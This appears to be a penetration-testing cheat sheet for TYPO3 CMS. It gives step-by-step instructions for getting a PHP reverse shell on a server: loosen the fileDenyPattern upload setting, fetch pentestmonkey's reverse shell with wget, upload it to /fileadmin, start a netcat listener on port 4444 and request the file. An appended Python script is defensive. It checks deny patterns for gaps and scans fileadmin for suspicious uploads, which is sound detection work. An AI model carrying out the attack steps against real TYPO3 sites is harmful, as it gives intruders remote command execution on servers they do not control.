Last modified: 2022-12-01
TYPO3 is a web content management system. It can run on web servers like Apache, Nginx or IIS.
Typical TYPO3 paths: /fileadmin/, /typo3/, /typo3conf/, /typo3temp/
First, check the setting that decides which uploaded file extensions are denied: go to “ADMIN TOOLS” → “Configure Installation-Wide Options” → “Backend” → “fileDenyPattern”.
Update the pattern if necessary, for example by removing “php[1-9]?” from it.
Next, prepare the reverse shell payload, saved as “shell.php”:
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
Go to “FILE” → “Filelist” and upload the payload to the root of /fileadmin.
Now start a listener to catch the shell:
nc -lvnp 4444
Then request “/fileadmin/shell.php”. You should get the shell.
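As an added defensive check (not part of this page's procedure), the following Python compares a configured fileDenyPattern against a baseline and lists files under fileadmin that the baseline would have refused, which is the trace a weakened pattern leaves behind. The patterns, probe names and file names are constructed, and applying the pattern as a case-insensitive regular expression to the file's basename is an assumption about how TYPO3 evaluates it.

```python
import re
from pathlib import Path
from typing import Iterable

# Constructed baseline shaped like a BE/fileDenyPattern value (assumption: not
# copied from TYPO3; compare against the default shipped with your own version).
BASELINE_DENY = r"\.(php[1-9]?|phpsh|phtml|phar)(\..*)?$|^\.htaccess$"
# Constructed weakened pattern: the "php[1-9]?" alternative has been removed,
# which is exactly the edit the procedure above relies on.
WEAKENED_DENY = r"\.(phpsh|phtml|phar)(\..*)?$|^\.htaccess$"

# Constructed probe names covering plain, numbered, double-extension and
# dotfile cases; extend with whatever your own baseline is meant to block.
PROBES = ("shell.php", "shell.php5", "shell.phtml", "shell.php.txt",
          ".htaccess", "notes.txt")


def is_denied(filename: str, pattern: str = BASELINE_DENY) -> bool:
    """True if the upload name would be rejected by the given deny pattern.

    Assumption: the pattern is matched case-insensitively against the basename.
    """
    return re.search(pattern, Path(filename).name, re.IGNORECASE) is not None


def deny_gaps(pattern: str, probes: Iterable[str] = PROBES) -> list[str]:
    """Probe names the baseline rejects but the configured pattern lets through."""
    return [n for n in probes
            if is_denied(n, BASELINE_DENY) and not is_denied(n, pattern)]


def suspicious_uploads(names: Iterable[str]) -> list[str]:
    """Files that the baseline would have refused; under fileadmin these
    indicate the pattern was weakened or bypassed and need a manual look."""
    return sorted(n for n in names if is_denied(n, BASELINE_DENY))


def scan_fileadmin(root: str) -> list[str]:
    """Walk a real fileadmin directory and report baseline-denied file names."""
    base = Path(root)
    return suspicious_uploads(str(p.relative_to(base))
                              for p in base.rglob("*") if p.is_file())


if __name__ == "__main__":
    print("gaps opened by weakened pattern:", deny_gaps(WEAKENED_DENY))
    # Constructed listing standing in for scan_fileadmin("/var/www/html/fileadmin")
    print("suspicious:", suspicious_uploads(["images/logo.png", "shell.php",
                                             "docs/a.pdf", ".htaccess"]))
```

Run `scan_fileadmin` against the live fileadmin path on a schedule and alert on a non-empty result, alongside a check that the configured fileDenyPattern yields no gaps against your baseline.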